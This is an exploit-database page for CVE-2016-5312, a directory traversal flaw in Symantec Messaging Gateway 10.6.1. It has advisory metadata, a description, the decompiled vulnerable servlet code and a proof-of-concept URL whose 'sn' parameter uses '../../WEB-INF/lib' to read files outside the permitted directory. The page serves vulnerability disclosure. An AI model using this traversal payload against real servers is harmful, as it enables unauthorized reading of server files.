Symantec Messaging Gateway - exploit.company

vendor:

Symantec Messaging Gateway

by:

R-73eN

6,5

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Symantec Messaging Gateway

Affected Version From: 10.6.1

Affected Version To: 10.6.1

Patch Exists: YES

Related CWE: CVE-2016-5312

CPE: a:symantec:symantec_messaging_gateway

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2016

Symantec Messaging Gateway <= 10.6.1 Directory Traversal

A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. This could potentially provide read access to some files/directories on the server for which the user is not authorized. The problem relies in the package kavachart-kcServlet-5.3.2.jar, File : com/ve/kavachart/servlet/ChartStream.java, where the vulnerable code is taking parameter 'sn' and writing it to the 'string variable' without any sanitanization for directory traversal and you can successfully use this to do a directory taverasl attack.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Symantec Messaging Gateway.

Source

Exploit-DB raw data:

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
# 
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
        block6 : {
            try {
                String string = httpServletRequest.getParameter("sn"); 
                //**** Taking parameter "sn" and writing it to the "string variable"


                if (string == null) break block6;
                String string2 = string.substring(string.length() - 3);
                 
                byte[] arrby = (byte[])this.getServletContext().getAttribute(string); 
           
                //**** The string variable is passed here without any sanitanization for directory traversal
                //**** and you can successfully use this to do a directory traversal.
                
                if (arrby != null) {
                    httpServletResponse.setContentType("image/" + string2);
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                    httpServletResponse.setContentLength(arrby.length);
                    servletOutputStream.write(arrby);
                    this.getServletContext().removeAttribute(string);
                    break block6;
                }


POC: 
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib